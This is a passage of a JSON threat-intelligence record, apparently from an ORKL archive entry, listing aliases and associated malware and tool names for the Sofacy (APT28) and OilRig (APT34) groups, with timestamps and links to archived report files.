				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434871,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85717db1d1ee235746fab628aecc468a0ca8cd8a.pdf",
		"text": "https://archive.orkl.eu/85717db1d1ee235746fab628aecc468a0ca8cd8a.txt",
		"img": "https://archive.orkl.eu/85717db1d1ee235746fab628aecc468a0ca8cd8a.jpg"
	}
}